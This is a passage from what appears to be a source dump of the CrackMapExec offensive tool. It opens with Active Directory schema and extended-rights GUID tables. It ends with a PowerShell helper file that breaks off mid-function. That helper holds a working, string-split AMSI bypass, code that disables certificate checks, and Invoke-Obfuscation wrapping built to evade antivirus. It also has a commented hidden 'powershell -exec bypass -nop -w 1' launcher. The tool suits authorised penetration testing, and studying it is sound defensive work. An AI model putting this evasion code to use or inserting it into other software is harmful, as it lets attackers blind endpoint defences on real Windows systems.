\"ba305f68-47e3-11d0-a1a6-00c04fd930c9\": \"Print-Share-Name\",\n \"9ee3b2e3-c7f3-45f8-8c9f-1382be4984d2\": \"msSFU-30-Nis-Domain\",\n \"19195a5f-6da0-11d0-afd3-00c04fd930c9\": \"NTDS-Service\",\n \"65650576-4699-4fc9-8d18-26e0cd0137a6\": \"ms-DS-Token-Group-Names\",\n \"d213decc-d81a-4384-aac2-dcfcfd631cf8\": \"Entry-TTL\",\n \"a8e8aa23-3e67-4af1-9d7a-2f1a1d633ac9\": \"ms-DS-isRODC\",\n \"075a42c9-c55a-45b1-ac93-eb086b31f610\": \"ms-WMI-intFlags2\",\n \"ba305f6c-47e3-11d0-a1a6-00c04fd930c9\": \"Print-Spooling\",\n \"93095ed3-6f30-4bdd-b734-65d569f5f7c9\": \"msSFU-30-Domains\",\n \"fa06d1f4-7922-4aad-b79c-b2201f54417c\": \"ms-DS-Token-Group-Names-Global-And-Universal\",\n \"9a7ad947-ca53-11d1-bbd0-0080c76670c0\": \"Extended-Attribute-Info\",\n \"8ab15858-683e-466d-877f-d640e1f9a611\": \"ms-DS-Last-Known-RDN\",\n \"f29fa736-de09-4be4-b23a-e734c124bacc\": \"ms-WMI-intFlags3\",\n \"ba305f73-47e3-11d0-a1a6-00c04fd930c9\": \"Print-Stapling-Supported\",\n \"084a944b-e150-4bfe-9345-40e1aedaebba\": \"msSFU-30-Yp-Servers\",\n \"bf967a84-0de6-11d0-a285-00aa003049e2\": \"Class-Store\",\n \"19195a5d-6da0-11d0-afd3-00c04fd930c9\": \"NTDS-Site-Settings\",\n \"523fc6c8-9af4-4a02-9cd7-3dea129eeb27\": \"ms-DS-Token-Group-Names-No-GC-Acceptable\",\n \"bf967966-0de6-11d0-a285-00aa003049e2\": \"Extended-Chars-Allowed\",\n \"c523e9c0-33b5-4ac8-8923-b57b927f42f6\": \"ms-DS-KeyVersionNumber\",\n \"bd74a7ac-c493-4c9c-bdfa-5c7b119ca6b2\": \"ms-WMI-intFlags4\",\n \"281416c9-1968-11d0-a28f-00aa003049e2\": \"Print-Start-Time\",\n \"04ee6aa6-f83b-469a-bf5a-3c00d3634669\": \"msSFU-30-Max-Gid-Number\",\n \"9a7ad948-ca53-11d1-bbd0-0080c76670c0\": \"Extended-Class-Info\",\n \"ad7940f8-e43a-4a42-83bc-d688e59ea605\": \"ms-DS-Logon-Time-Sync-Interval\",\n \"fb920c2c-f294-4426-8ac1-d24b42aa2bce\": \"ms-WMI-intMax\",\n \"ba305f6b-47e3-11d0-a1a6-00c04fd930c9\": \"Print-Status\",\n \"ec998437-d944-4a28-8500-217588adfc75\": \"msSFU-30-Max-Uid-Number\",\n \"bf967a85-0de6-11d0-a285-00aa003049e2\": \"Com-Connection-Point\",\n \"2a132586-9373-11d1-aebc-0000f80367c1\": \"NTFRS-Member\",\n \"bf967ab0-0de6-11d0-a285-00aa003049e2\": \"Security-Principal\",\n \"bf967972-0de6-11d0-a285-00aa003049e2\": \"Extension-Name\",\n \"60234769-4819-4615-a1b2-49d2f119acb5\": \"ms-DS-Mastered-By\",\n \"68c2e3ba-9837-4c70-98e0-f0c33695d023\": \"ms-WMI-intMin\",\n \"244b296e-5abd-11d0-afd2-00c04fd930c9\": \"Printer-Name\",\n \"585c9d5e-f599-4f07-9cf9-4373af4b89d3\": \"msSFU-30-NSMAP-Field-Position\",\n \"7ece040f-9327-4cdc-aad3-037adfe62639\": \"ms-DS-User-Allowed-NTLM-Network-Authentication\",\n \"d24e2846-1dd9-4bcf-99d7-a6227cc86da7\": \"Extra-Columns\",\n \"fdd337f5-4999-4fce-b252-8ff9c9b43875\": \"ms-DS-Maximum-Password-Age\",\n \"6af565f6-a749-4b72-9634-3c5d47e6b4e0\": \"ms-WMI-intValidValues\",\n \"bf967a01-0de6-11d0-a285-00aa003049e2\": \"Prior-Set-Time\",\n \"c875d82d-2848-4cec-bb50-3c5486d09d57\": \"msSFU-30-Posix-Member\",\n \"bf967a86-0de6-11d0-a285-00aa003049e2\": \"Computer\",\n \"5245803a-ca6a-11d0-afff-0000f80367c1\": \"NTFRS-Replica-Set\",\n \"278947b9-5222-435e-96b7-1503858c2b48\": \"ms-DS-Service-Allowed-NTLM-Network-Authentication\",\n \"bf967974-0de6-11d0-a285-00aa003049e2\": \"Facsimile-Telephone-Number\",\n \"2a74f878-4d9c-49f9-97b3-6767d1cbd9a3\": \"ms-DS-Minimum-Password-Age\",\n \"f4d8085a-8c5b-4785-959b-dc585566e445\": \"ms-WMI-int8Default\",\n \"bf967a02-0de6-11d0-a285-00aa003049e2\": \"Prior-Value\",\n \"7bd76b92-3244-438a-ada6-24f5ea34381e\": \"msSFU-30-Posix-Member-Of\",\n \"aacd2170-482a-44c6-b66e-42c2f66a285c\": \"ms-DS-Strong-NTLM-Policy\",\n \"d9e18315-8939-11d1-aebc-0000f80367c1\": \"File-Ext-Priority\",\n \"b21b3439-4c3a-441c-bb5f-08f20e9b315e\": \"ms-DS-Minimum-Password-Length\",\n \"e3d8b547-003d-4946-a32b-dc7cedc96b74\": \"ms-WMI-int8Max\",\n \"281416c7-1968-11d0-a28f-00aa003049e2\": \"Priority\",\n \"97d2bf65-0466-4852-a25a-ec20f57ee36c\": \"msSFU-30-Netgroup-Host-At-Domain\",\n \"bf967a87-0de6-11d0-a285-00aa003049e2\": \"Configuration\",\n \"f780acc2-56f0-11d1-a9c6-0000f80367c1\": \"NTFRS-Settings\",\n \"bf967976-0de6-11d0-a285-00aa003049e2\": \"Flags\",\n \"f9c9a57c-3941-438d-bebf-0edaf2aca187\": \"ms-DS-OIDToGroup-Link\",\n \"ed1489d1-54cc-4066-b368-a00daa2664f1\": \"ms-WMI-int8Min\",\n \"bf967a03-0de6-11d0-a285-00aa003049e2\": \"Private-Key\",\n \"a9e84eed-e630-4b67-b4b3-cad2a82d345e\": \"msSFU-30-Netgroup-User-At-Domain\",\n \"ab6a1156-4dc7-40f5-9180-8e4ce42fe5cd\": \"ms-DS-AuthN-Policy\",\n \"b7b13117-b82e-11d0-afee-0000f80367c1\": \"Flat-Name\",\n \"1a3d0d20-5844-4199-ad25-0f5039a76ada\": \"ms-DS-OIDToGroup-Link-BL\",\n \"103519a9-c002-441b-981a-b0b3e012c803\": \"ms-WMI-int8ValidValues\",\n \"19405b9a-3cfa-11d1-a9c0-0000f80367c1\": \"Privilege-Attributes\",\n \"0dea42f5-278d-4157-b4a7-49b59664915b\": \"msSFU-30-Is-Valid-Container\",\n \"5cb41ecf-0e4c-11d0-a286-00aa003049e2\": \"Connection-Point\",\n \"2a132588-9373-11d1-aebc-0000f80367c1\": \"NTFRS-Subscriber\",\n \"b002f407-1340-41eb-bca0-bd7d938e25a9\": \"ms-DS-Source-Anchor\",\n \"bf967977-0de6-11d0-a285-00aa003049e2\": \"Force-Logoff\",\n \"fed81bb7-768c-4c2f-9641-2245de34794d\": \"ms-DS-Password-History-Length\",\n \"6736809f-2064-443e-a145-81262b1f1366\": \"ms-WMI-Mof\",\n \"19405b98-3cfa-11d1-a9c0-0000f80367c1\": \"Privilege-Display-Name\",\n \"4503d2a3-3d70-41b8-b077-dff123c15865\": \"msSFU-30-Crypt-Method\",\n \"5cb41ed0-0e4c-11d0-a286-00aa003049e2\": \"Contact\",\n \"34f6bdf5-2e79-4c3b-8e14-3d93b75aab89\": \"ms-DS-Object-SOA\",\n \"3e97891e-8c01-11d0-afda-00c04fd930c9\": \"Foreign-Identifier\",\n \"db68054b-c9c3-4bf0-b15b-0fb52552a610\": \"ms-DS-Password-Complexity-Enabled\",\n \"c6c8ace5-7e81-42af-ad72-77412c5941c4\": \"ms-WMI-Name\",\n \"19405b9b-3cfa-11d1-a9c0-0000f80367c1\": \"Privilege-Holder\",\n \"e65c30db-316c-4060-a3a0-387b083f09cd\": \"ms-TS-Profile-Path\",\n \"bf967aa7-0de6-11d0-a285-00aa003049e2\": \"Person\",\n \"2a132587-9373-11d1-aebc-0000f80367c1\": \"NTFRS-Subscriptions\",\n \"7bfdcb88-4807-11d1-a9c3-0000f80367c1\": \"Friendly-Names\",\n \"75ccdd8f-af6c-4487-bb4b-69e4d38a959c\": \"ms-DS-Password-Reversible-Encryption-Enabled\",\n \"eaba628f-eb8e-4fe9-83fc-693be695559b\": \"ms-WMI-NormalizedClass\",\n \"19405b99-3cfa-11d1-a9c0-0000f80367c1\": \"Privilege-Value\",\n \"5d3510f0-c4e7-4122-b91f-a20add90e246\": \"ms-TS-Home-Directory\",\n \"bf967ab7-0de6-11d0-a285-00aa003049e2\": \"Top\",\n \"9a7ad949-ca53-11d1-bbd0-0080c76670c0\": \"From-Entry\",\n \"94f2800c-531f-4aeb-975d-48ac39fd8ca4\": \"ms-DS-Local-Effective-Deletion-Time\",\n \"27e81485-b1b0-4a8b-bedd-ce19a837e26e\": \"ms-WMI-Parm1\",\n \"d9e18317-8939-11d1-aebc-0000f80367c1\": \"Product-Code\",\n \"5f0a24d9-dffa-4cd9-acbf-a0680c03731e\": \"ms-TS-Home-Drive\",\n \"bf967a8b-0de6-11d0-a285-00aa003049e2\": \"Container\",\n \"bf967aa3-0de6-11d0-a285-00aa003049e2\": \"Organization\",\n \"bf967979-0de6-11d0-a285-00aa003049e2\": \"From-Server\",\n \"4ad6016b-b0d2-4c9b-93b6-5964b17b968c\": \"ms-DS-Local-Effective-Recycle-Time\",\n \"0003508e-9c42-4a76-a8f4-38bf64bab0de\": \"ms-WMI-Parm2\",\n \"bf967a05-0de6-11d0-a285-00aa003049e2\": \"Profile-Path\",\n \"3a0cd464-bc54-40e7-93ae-a646a6ecc4b4\": \"ms-TS-Allow-Logon\",\n \"bf967aa4-0de6-11d0-a285-00aa003049e2\": \"Organizational-Person\",\n \"bf967a90-0de6-11d0-a285-00aa003049e2\": \"Sam-Domain\",\n \"2a132578-9373-11d1-aebc-0000f80367c1\": \"Frs-Computer-Reference\",\n \"b05bda89-76af-468a-b892-1be55558ecc8\": \"ms-DS-Lockout-Observation-Window\",\n \"45958fb6-52bd-48ce-9f9f-c2712d9f2bfc\": \"ms-WMI-Parm3\",\n \"e1aea402-cd5b-11d0-afff-0000f80367c1\": \"Proxied-Object-Name\",\n \"15177226-8642-468b-8c48-03ddfd004982\": \"ms-TS-Remote-Control\",\n \"8297931e-86d3-11d0-afda-00c04fd930c9\": \"Control-Access-Right\",\n \"2a132579-9373-11d1-aebc-0000f80367c1\": \"Frs-Computer-Reference-BL\",\n \"421f889a-472e-4fe4-8eb9-e1d0bc6071b2\": \"ms-DS-Lockout-Duration\",\n \"3800d5a3-f1ce-4b82-a59a-1528ea795f59\": \"ms-WMI-Parm4\",\n \"bf967a06-0de6-11d0-a285-00aa003049e2\": \"Proxy-Addresses\",\n \"326f7089-53d8-4784-b814-46d8535110d2\": \"ms-TS-Max-Disconnection-Time\",\n \"a8df74bf-c5ea-11d1-bbcb-0080c76670c0\": \"Organizational-Role\",\n \"2a13257a-9373-11d1-aebc-0000f80367c1\": \"FRS-Control-Data-Creation\",\n \"b8c8c35e-4a19-4a95-99d0-69fe4446286f\": \"ms-DS-Lockout-Threshold\",\n \"ab920883-e7f8-4d72-b4a0-c0449897509d\": \"ms-WMI-PropertyName\",\n \"5fd424d6-1262-11d0-a060-00aa006c33ed\": \"Proxy-Generation-Enabled\",\n \"1d960ee2-6464-4e95-a781-e3b5cd5f9588\": \"ms-TS-Max-Connection-Time\",\n \"bf967a8c-0de6-11d0-a285-00aa003049e2\": \"Country\",\n \"2a13257b-9373-11d1-aebc-0000f80367c1\": \"FRS-Control-Inbound-Backlog\",\n \"64c80f48-cdd2-4881-a86d-4e97b6f561fc\": \"ms-DS-PSO-Applies-To\",\n \"65fff93e-35e3-45a3-85ae-876c6718297f\": \"ms-WMI-Query\",\n \"bf967a07-0de6-11d0-a285-00aa003049e2\": \"Proxy-Lifetime\",\n \"ff739e9c-6bb7-460e-b221-e250f3de0f95\": \"ms-TS-Max-Idle-Time\",\n \"bf967aa5-0de6-11d0-a285-00aa003049e2\": \"Organizational-Unit\",\n \"2a13257c-9373-11d1-aebc-0000f80367c1\": \"FRS-Control-Outbound-Backlog\",\n \"5e6cf031-bda8-43c8-aca4-8fee4127005b\": \"ms-DS-PSO-Applied\",\n \"7d3cfa98-c17b-4254-8bd7-4de9b932a345\": \"ms-WMI-QueryLanguage\",\n \"80a67e28-9f22-11d0-afdd-00c04fd930c9\": \"Public-Key-Policy\",\n \"366ed7ca-3e18-4c7f-abae-351a01e4b4f7\": \"ms-TS-Reconnection-Action\",\n \"167758ca-47f3-11d1-a9c3-0000f80367c1\": \"CRL-Distribution-Point\",\n \"1be8f171-a9ff-11d0-afe2-00c04fd930c9\": \"FRS-Directory-Filter\",\n \"eadd3dfe-ae0e-4cc2-b9b9-5fe5b6ed2dd2\": \"ms-DS-Required-Domain-Behavior-Version\",\n \"87b78d51-405f-4b7f-80ed-2bd28786f48d\": \"ms-WMI-ScopeGuid\",\n \"b4b54e50-943a-11d1-aebd-0000f80367c1\": \"Purported-Search\",\n \"1cf41bba-5604-463e-94d6-1a1287b72ca3\": \"ms-TS-Broken-Connection-Action\",\n \"bf967aa6-0de6-11d0-a285-00aa003049e2\": \"Package-Registration\",\n \"1be8f177-a9ff-11d0-afe2-00c04fd930c9\": \"FRS-DS-Poll\",\n \"4beca2e8-a653-41b2-8fee-721575474bec\": \"ms-DS-Required-Forest-Behavior-Version\",\n \"34f7ed6c-615d-418d-aa00-549a7d7be03e\": \"ms-WMI-SourceOrganization\",\n \"bf967a09-0de6-11d0-a285-00aa003049e2\": \"Pwd-History-Length\",\n \"23572aaf-29dd-44ea-b0fa-7e8438b9a4a3\": \"ms-TS-Connect-Client-Drives\",\n \"bf967a8d-0de6-11d0-a285-00aa003049e2\": \"Cross-Ref\",\n \"52458020-ca6a-11d0-afff-0000f80367c1\": \"FRS-Extensions\",\n \"b77ea093-88d0-4780-9a98-911f8e8b1dca\": \"ms-DS-Resultant-PSO\",\n \"152e42b6-37c5-4f55-ab48-1606384a9aea\": \"ms-WMI-stringDefault\",\n \"bf967a0a-0de6-11d0-a285-00aa003049e2\": \"Pwd-Last-Set\",\n \"8ce6a937-871b-4c92-b285-d99d4036681c\": \"ms-TS-Connect-Printer-Drives\",\n \"1be8f178-a9ff-11d0-afe2-00c04fd930c9\": \"FRS-Fault-Condition\",\n \"456374ac-1f0a-4617-93cf-bc55a7c9d341\": \"ms-DS-Password-Settings-Precedence\",\n \"37609d31-a2bf-4b58-8f53-2b64e57a076d\": \"ms-WMI-stringValidValues\",\n \"bf967a0b-0de6-11d0-a285-00aa003049e2\": \"Pwd-Properties\",\n \"c0ffe2bd-cacf-4dc7-88d5-61e9e95766f6\": \"ms-TS-Default-To-Main-Printer\",\n \"ef9e60e0-56f7-11d1-a9c6-0000f80367c1\": \"Cross-Ref-Container\",\n \"b7b13122-b82e-11d0-afee-0000f80367c1\": \"Physical-Location\",\n \"1be8f170-a9ff-11d0-afe2-00c04fd930c9\": \"FRS-File-Filter\",\n \"d1e169a4-ebe9-49bf-8fcb-8aef3874592d\": \"ms-DS-Max-Values\",\n \"95b6d8d6-c9e8-4661-a2bc-6a5cabc04c62\": \"ms-WMI-TargetClass\",\n \"80a67e4e-9f22-11d0-afdd-00c04fd930c9\": \"Quality-Of-Service\",\n \"a744f666-3d3c-4cc8-834b-9d4f6f687b8b\": \"ms-TS-Work-Directory\",\n \"2a13257d-9373-11d1-aebc-0000f80367c1\": \"FRS-Flags\",\n \"cbf7e6cd-85a4-4314-8939-8bfe80597835\": \"ms-DS-Members-For-Az-Role\",\n \"1c4ab61f-3420-44e5-849d-8b5dbf60feb7\": \"ms-WMI-TargetNameSpace\",\n \"cbf70a26-7e78-11d2-9921-0000f87a57d4\": \"Query-Filter\",\n \"9201ac6f-1d69-4dfb-802e-d95510109599\": \"ms-TS-Initial-Program\",\n \"bf967a8e-0de6-11d0-a285-00aa003049e2\": \"Device\",\n \"e5209ca2-3bba-11d2-90cc-00c04fd91ab1\": \"PKI-Certificate-Template\",\n \"5245801e-ca6a-11d0-afff-0000f80367c1\": \"FRS-Level-Limit\",\n \"ececcd20-a7e0-4688-9ccf-02ece5e287f5\": \"ms-DS-Members-For-Az-Role-BL\",\n \"c44f67a5-7de5-4a1f-92d9-662b57364b77\": \"ms-WMI-TargetObject\",\n \"e1aea404-cd5b-11d0-afff-0000f80367c1\": \"Query-Policy-BL\",\n \"40e1c407-4344-40f3-ab43-3625a34a63a2\": \"ms-TS-Endpoint-Data\",\n \"2a13257e-9373-11d1-aebc-0000f80367c1\": \"FRS-Member-Reference\",\n \"5a2eacd7-cc2b-48cf-9d9a-b6f1a0024de9\": \"ms-DS-NC-Type\",\n \"5006a79a-6bfe-4561-9f52-13cf4dd3e560\": \"ms-WMI-TargetPath\",\n \"e1aea403-cd5b-11d0-afff-0000f80367c1\": \"Query-Policy-Object\",\n \"377ade80-e2d8-46c5-9bcd-6d9dec93b35e\": \"ms-TS-Endpoint-Type\",\n \"8447f9f2-1027-11d0-a05f-00aa006c33ed\": \"Dfs-Configuration\",\n \"ee4aa692-3bba-11d2-90cc-00c04fd91ab1\": \"PKI-Enrollment-Service\",\n \"2a13257f-9373-11d1-aebc-0000f80367c1\": \"FRS-Member-Reference-BL\",\n \"cafcb1de-f23c-46b5-adf7-1e64957bd5db\": \"ms-DS-Non-Members\",\n \"ca2a281e-262b-4ff7-b419-bc123352a4e9\": \"ms-WMI-TargetType\",\n \"7bfdcb86-4807-11d1-a9c3-0000f80367c1\": \"QueryPoint\",\n \"3c08b569-801f-4158-b17b-e363d6ae696a\": \"ms-TS-Endpoint-Plugin\",\n}\n\n\nEXTENDED_RIGHTS = {\n \"ab721a52-1e2f-11d0-9819-00aa0040529b\": \"Domain-Administer-Server\",\n \"ab721a53-1e2f-11d0-9819-00aa0040529b\": \"User-Change-Password\",\n \"00299570-246d-11d0-a768-00aa006e0529\": \"User-Force-Change-Password\",\n \"ab721a55-1e2f-11d0-9819-00aa0040529b\": \"Send-To\",\n \"c7407360-20bf-11d0-a768-00aa006e0529\": \"Domain-Password\",\n \"59ba2f42-79a2-11d0-9020-00c04fc2d3cf\": \"General-Information\",\n \"4c164200-20c0-11d0-a768-00aa006e0529\": \"User-Account-Restrictions\",\n \"5f202010-79a5-11d0-9020-00c04fc2d4cf\": \"User-Logon\",\n \"bc0ac240-79a9-11d0-9020-00c04fc2d4cf\": \"Membership\",\n \"a1990816-4298-11d1-ade2-00c04fd8d5cd\": \"Open-Address-Book\",\n \"e45795b2-9455-11d1-aebd-0000f80367c1\": \"Email-Information\",\n \"e45795b3-9455-11d1-aebd-0000f80367c1\": \"Web-Information\",\n \"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2\": \"DS-Replication-Get-Changes\",\n \"1131f6ab-9c07-11d1-f79f-00c04fc2dcd2\": \"DS-Replication-Synchronize\",\n \"1131f6ac-9c07-11d1-f79f-00c04fc2dcd2\": \"DS-Replication-Manage-Topology\",\n \"e12b56b6-0a95-11d1-adbb-00c04fd8d5cd\": \"Change-Schema-Master\",\n \"d58d5f36-0a98-11d1-adbb-00c04fd8d5cd\": \"Change-Rid-Master\",\n \"fec364e0-0a98-11d1-adbb-00c04fd8d5cd\": \"Do-Garbage-Collection\",\n \"0bc1554e-0a99-11d1-adbb-00c04fd8d5cd\": \"Recalculate-Hierarchy\",\n \"1abd7cf8-0a99-11d1-adbb-00c04fd8d5cd\": \"Allocate-Rids\",\n \"bae50096-4752-11d1-9052-00c04fc2d4cf\": \"Change-PDC\",\n \"440820ad-65b4-11d1-a3da-0000f875ae0d\": \"Add-GUID\",\n \"014bf69c-7b3b-11d1-85f6-08002be74fab\": \"Change-Domain-Master\",\n \"4b6e08c0-df3c-11d1-9c86-006008764d0e\": \"msmq-Receive-Dead-Letter\",\n \"4b6e08c1-df3c-11d1-9c86-006008764d0e\": \"msmq-Peek-Dead-Letter\",\n \"4b6e08c2-df3c-11d1-9c86-006008764d0e\": \"msmq-Receive-computer-Journal\",\n \"4b6e08c3-df3c-11d1-9c86-006008764d0e\": \"msmq-Peek-computer-Journal\",\n \"06bd3200-df3e-11d1-9c86-006008764d0e\": \"msmq-Receive\",\n \"06bd3201-df3e-11d1-9c86-006008764d0e\": \"msmq-Peek\",\n \"06bd3202-df3e-11d1-9c86-006008764d0e\": \"msmq-Send\",\n \"06bd3203-df3e-11d1-9c86-006008764d0e\": \"msmq-Receive-journal\",\n \"b4e60130-df3f-11d1-9c86-006008764d0e\": \"msmq-Open-Connector\",\n \"edacfd8f-ffb3-11d1-b41d-00a0c968f939\": \"Apply-Group-Policy\",\n \"037088f8-0ae1-11d2-b422-00a0c968f939\": \"RAS-Information\",\n \"9923a32a-3607-11d2-b9be-0000f87a36b2\": \"DS-Install-Replica\",\n \"cc17b1fb-33d9-11d2-97d4-00c04fd8d5cd\": \"Change-Infrastructure-Master\",\n \"be2bb760-7f46-11d2-b9ad-00c04f79f805\": \"Update-Schema-Cache\",\n \"62dd28a8-7f46-11d2-b9ad-00c04f79f805\": \"Recalculate-Security-Inheritance\",\n \"69ae6200-7f46-11d2-b9ad-00c04f79f805\": \"DS-Check-Stale-Phantoms\",\n \"0e10c968-78fb-11d2-90d4-00c04f79dc55\": \"Certificate-Enrollment\",\n \"bf9679c0-0de6-11d0-a285-00aa003049e2\": \"Self-Membership\",\n \"72e39547-7b18-11d1-adef-00c04fd8d5cd\": \"Validated-DNS-Host-Name\",\n \"b7b1b3dd-ab09-4242-9e30-9980e5d322f7\": \"Generate-RSoP-Planning\",\n \"9432c620-033c-4db7-8b58-14ef6d0bf477\": \"Refresh-Group-Cache\",\n \"91d67418-0135-4acc-8d79-c08e857cfbec\": \"SAM-Enumerate-Entire-Domain\",\n \"b7b1b3de-ab09-4242-9e30-9980e5d322f7\": \"Generate-RSoP-Logging\",\n \"b8119fd0-04f6-4762-ab7a-4986c76b3f9a\": \"Domain-Other-Parameters\",\n \"e2a36dc9-ae17-47c3-b58b-be34c55ba633\": \"Create-Inbound-Forest-Trust\",\n \"1131f6ad-9c07-11d1-f79f-00c04fc2dcd2\": \"DS-Replication-Get-Changes-All\",\n \"ba33815a-4f93-4c76-87f3-57574bff8109\": \"Migrate-SID-History\",\n \"45ec5156-db7e-47bb-b53f-dbeb2d03c40f\": \"Reanimate-Tombstones\",\n \"2f16c4a5-b98e-432c-952a-cb388ba33f2e\": \"DS-Execute-Intentions-Script\",\n \"f98340fb-7c5b-4cdb-a00b-2ebdfa115a96\": \"DS-Replication-Monitor-Topology\",\n \"280f369c-67c7-438e-ae98-1d46f3c6f541\": \"Update-Password-Not-Required-Bit\",\n \"ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501\": \"Unexpire-Password\",\n \"05c74c5e-4deb-43b4-bd9f-86664c2a7fd5\": \"Enable-Per-User-Reversibly-Encrypted-Password\",\n \"4ecc03fe-ffc0-4947-b630-eb672a8a9dbc\": \"DS-Query-Self-Quota\",\n \"91e647de-d96f-4b70-9557-d63ff4f3ccd8\": \"Private-Information\",\n \"1131f6ae-9c07-11d1-f79f-00c04fc2dcd2\": \"Read-Only-Replication-Secret-Synchronization\",\n \"5805bc62-bdc9-4428-a5e2-856a0f4c185e\": \"Terminal-Server-License-Server\",\n \"1a60ea8d-58a6-4b20-bcdc-fb71eb8a9ff8\": \"Reload-SSL-Certificate\",\n \"89e95b76-444d-4c62-991a-0facbeda640c\": \"DS-Replication-Get-Changes-In-Filtered-Set\",\n \"7726b9d5-a4b4-4288-a6b2-dce952e80a7f\": \"Run-Protect-Admin-Groups-Task\",\n \"7c0e2a7c-a419-48e4-a995-10180aad54dd\": \"Manage-Optional-Features\",\n \"3e0f7e18-2c7a-4c10-ba82-4d926db99a3e\": \"DS-Clone-Domain-Controller\",\n \"d31a8757-2447-4545-8081-3bb610cacbf2\": \"Validated-MS-DS-Behavior-Version\",\n \"80863791-dbe9-4eb8-837e-7f0ab55d9ac7\": \"Validated-MS-DS-Additional-DNS-Host-Name\",\n \"a05b8cc2-17bc-4802-a710-e7c15ab866a2\": \"Certificate-AutoEnrollment\",\n \"4125c71f-7fac-4ff0-bcb7-f09a41325286\": \"DS-Set-Owner\",\n \"88a9933e-e5c8-4f2a-9dd7-2527416b8092\": \"DS-Bypass-Quota\",\n \"084c93a2-620d-4879-a836-f0ae47de0e89\": \"DS-Read-Partition-Secrets\",\n \"94825a8d-b171-4116-8146-1e34d8f54401\": \"DS-Write-Partition-Secrets\",\n \"9b026da6-0d3c-465c-8bee-5199d7165cba\": \"DS-Validated-Write-Computer\",\n \"ab721a54-1e2f-11d0-9819-00aa0040529b\": \"Send-As\",\n \"ab721a56-1e2f-11d0-9819-00aa0040529b\": \"Receive-As\",\n \"77b5b886-944a-11d1-aebd-0000f80367c1\": \"Personal-Information\",\n \"e48d0154-bcf8-11d1-8702-00c04fb96050\": \"Public-Information\",\n \"f3a64788-5306-11d1-a9c5-0000f80367c1\": \"Validated-SPN\",\n \"68b1d179-0d15-4d4f-ab71-46152e79a7bc\": \"Allowed-To-Authenticate\",\n \"ffa6f046-ca4b-4feb-b40d-04dfee722543\": \"MS-TS-GatewayAccess\",\n}\n" }, { "path": "cme/helpers/powershell.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport os\nimport re\nfrom sys import exit\nfrom string import ascii_lowercase\nfrom random import choice, sample\nfrom subprocess import call\nfrom cme.helpers.misc import which\nfrom cme.logger import cme_logger\nfrom cme.paths import CME_PATH, DATA_PATH\nfrom base64 import b64encode\n\nobfuscate_ps_scripts = False\n\n\ndef get_ps_script(path):\n return os.path.join(DATA_PATH, path)\n\n\ndef encode_ps_command(command):\n return b64encode(command.encode(\"UTF-16LE\")).decode()\n\n\ndef is_powershell_installed():\n if which(\"powershell\"):\n return True\n return False\n\n\ndef obfs_ps_script(path_to_script):\n ps_script = path_to_script.split(\"/\")[-1]\n obfs_script_dir = os.path.join(CME_PATH, \"obfuscated_scripts\")\n obfs_ps_script = os.path.join(obfs_script_dir, ps_script)\n\n if is_powershell_installed() and obfuscate_ps_scripts:\n if os.path.exists(obfs_ps_script):\n cme_logger.display(\"Using cached obfuscated Powershell script\")\n with open(obfs_ps_script, \"r\") as script:\n return script.read()\n\n cme_logger.display(\"Performing one-time script obfuscation, go look at some memes cause this can take a bit...\")\n\n invoke_obfs_command = f\"powershell -C 'Import-Module {get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1')};Invoke-Obfuscation -ScriptPath {get_ps_script(path_to_script)} -Command \\\"TOKEN,ALL,1,OUT {obfs_ps_script}\\\" -Quiet'\"\n cme_logger.debug(invoke_obfs_command)\n\n with open(os.devnull, \"w\") as devnull:\n return_code = call(invoke_obfs_command, stdout=devnull, stderr=devnull, shell=True)\n\n cme_logger.success(\"Script obfuscated successfully\")\n\n with open(obfs_ps_script, \"r\") as script:\n return script.read()\n\n else:\n with open(get_ps_script(path_to_script), \"r\") as script:\n \"\"\"\n Strip block comments, line comments, empty lines, verbose statements,\n and debug statements from a PowerShell source file.\n \"\"\"\n # strip block comments\n stripped_code = re.sub(re.compile(\"<#.*?#>\", re.DOTALL), \"\", script.read())\n # strip blank lines, lines starting with #, and verbose/debug statements\n stripped_code = \"\\n\".join([line for line in stripped_code.split(\"\\n\") if ((line.strip() != \"\") and (not line.strip().startswith(\"#\")) and (not line.strip().lower().startswith(\"write-verbose \")) and (not line.strip().lower().startswith(\"write-debug \")))])\n\n return stripped_code\n\n\ndef create_ps_command(ps_command, force_ps32=False, dont_obfs=False, custom_amsi=None):\n if custom_amsi:\n with open(custom_amsi) as file_in:\n lines = []\n for line in file_in:\n lines.append(line)\n amsi_bypass = \"\".join(lines)\n else:\n amsi_bypass = \"\"\"[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\ntry{\n[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)\n}catch{}\n\"\"\"\n\n if force_ps32:\n command = (\n amsi_bypass\n + \"\"\"\n$functions = {{\n function Command-ToExecute\n {{\n{command}\n }}\n}}\nif ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')\n{{\n $job = Start-Job -InitializationScript $functions -ScriptBlock {{Command-ToExecute}} -RunAs32\n $job | Wait-Job\n}}\nelse\n{{\n IEX \"$functions\"\n Command-ToExecute\n}}\n\"\"\".format(\n command=amsi_bypass + ps_command\n )\n )\n\n else:\n command = amsi_bypass + ps_command\n\n cme_logger.debug(\"Generated PS command:\\n {}\\n\".format(command))\n\n # We could obfuscate the initial launcher using Invoke-Obfuscation but because this function gets executed\n # concurrently it would spawn a local powershell process per host which isn't ideal, until I figure out a good way\n # of dealing with this it will use the partial python implementation that I stole from GreatSCT\n # (https://github.com/GreatSCT/GreatSCT) <3\n\n \"\"\"\n if is_powershell_installed():\n\n temp = tempfile.NamedTemporaryFile(prefix='cme_',\n suffix='.ps1',\n dir='/tmp')\n temp.write(command)\n temp.read()\n\n encoding_types = [1,2,3,4,5,6]\n while True:\n encoding = random.choice(encoding_types)\n invoke_obfs_command = 'powershell -C \\'Import-Module {};Invoke-Obfuscation -ScriptPath {} -Command \"ENCODING,{}\" -Quiet\\''.format(get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1'),\n temp.name,\n encoding)\n cme_logger.debug(invoke_obfs_command)\n out = check_output(invoke_obfs_command, shell=True).split('\\n')[4].strip()\n\n command = 'powershell.exe -exec bypass -noni -nop -w 1 -C \"{}\"'.format(out)\n cme_logger.debug('Command length: {}'.format(len(command)))\n\n if len(command) <= 8192:\n temp.close()\n break\n\n encoding_types.remove(encoding)\n \n 